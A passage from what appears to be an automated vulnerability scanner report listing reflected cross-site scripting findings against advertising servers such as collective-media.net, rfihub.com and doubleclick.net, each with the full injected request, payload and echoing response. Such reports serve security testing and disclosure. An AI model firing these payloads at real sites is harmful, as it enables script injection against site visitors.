Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Mon, 14 Feb 2011 01:35:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:23 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338?d7086'-alert(1)-'ae7eaada4f3;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22425'-alert(1)-'80a6204c2ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;click0=;ord=$cacheBuster$ HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;net=cm;ord=$cacheBuster$;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b37'-alert(1)-'600aca90b1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep/;sz=300x250;net=cm;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b527'-alert(1)-'c296858d3f2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep/;sz=300x250;net=cm;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.10. http://a.rfihub.com/sed [pa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e6c4'><script>alert(1)</script>cd7c8900c9b was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014; k="aAJBlvOUA==AGnmc809AN1288024309000AAABLgCILYI=AGnmc801AN1288021692000AAABLgCILYI=AGnmc829AN1288026445000AAABLgCILYI=AGnmc736AN1288018708000AAABLgCILYI=AGnmc805AN1288021876000AAABLgCILYI=AGnmc825AN1288026116000AAABLgCILYI=AGnmc773AN1288019600000AAABLgCILYI=AGnmc747AN1288024980000AAABLgCILYI=AGnmc748AN1288024901000AAABLgCILYI="; s="aAE-DNNhg==AE9479AN1294103956000AAABLgq3o_Y=AF12446AN1285279980000AAABLgq3o_Y=AE9438AN1273618082000AAABLgBpdhw=AE8438AN1275963655000AAABLgBpdhw="; b="aAMN9qejw==AD741AAABLgrfWIY=AD793AAABLgrfWIY=AD809AAABLgrfWIY=AD825AAABLgrfWIY=AD736AAABLgrfWIY=AD781AAABLgrfWIY=AD829AAABLgrfWIY=AD748AAABLgrfWIY=AD801AAABLgrfWIY=AD773AAABLgrfWIY=AD747AAABLgrfWIY=AD805AAABLgBphCs="; m="aAGRcyqzg==AI20472726AAABLgrfWIc=AI20472726AAABLgrTunc=AI20472726AAABLgq3K4s=AI20472726AAABLgBphCw=AI20472701AAABLffM4Y0=AI20472701AAABLevCTs8="; g="aAG9rzUwA==A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8="; 
c="aAh4fa6Qg==AFd1243AB3AAABLhsS7_c=AFv2946AB3AAABLhsS7_c=AGu14941AB3AAABLhsS7_c=AFc1243AB3AAABLhsS7_c=AFl2946AB3AAABLhsS7_c=AGt14941AB3AAABLhsS7_c=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AGb15705AB1AAABLgq3o_Y=AGa15705AB1AAABLgq3o_Y=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw="; f="aAFSdsTtQ==AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4="; e=cd

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aAHN7Dy1Q==A_ax3hqHhIaQ7kH|15705|73433|68086|14121|1243|92574|445|32981|7792AAABLiHOrUw=A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: c="aAh0Fw84g==AFd1243AB4AAABLiHOrUg=AFv2946AB4AAABLiHOrUg=AGu14941AB4AAABLiHOrUg=AFc1243AB4AAABLiHOrUg=AFl2946AB4AAABLiHOrUg=AGt14941AB4AAABLiHOrUg=AGb15705AB2AAABLiHOrUg=AGa15705AB2AAABLiHOrUg=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: f="aAGmgjuLw==AK1297647316AB1AAABLiHOrUg=AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Content-Length: 2175

<html><body><span id="__rfi" style="height:0px; width:0px"><IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647316296;click=http://a.rfihub.com/aci
...[SNIP]...
border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=19969&aa=15705,73433,14121,68086,1243,14941,x3hqHhIaQ7kH,http%3A%2F%2Frocketfuelinc.com,776,2946,32981,1879,7792&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&id=&ra=6473163000.11331372547018437'>
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc59a"-alert(1)-"ed8a505e8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D188%26migSource%3Dadsrv2%26migTrackDataExt%3D2426847%3B58824910%3B234278619%3B39992677%26migRandom%3D2161819%26migTrackFmtExt%3Dclient%3Bio%3Bad%3B
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcff3"-alert(1)-"0f153e75e05 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:35:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6007

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05http://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58824910;234278619;39992677&migRandom=2145756&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.univers
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a15"-alert(1)-"a5169947ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:17:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7933

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
zOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1http://www.adobe.com/products/creativesuite/design?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edc03"-alert(1)-"53df0e3547d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
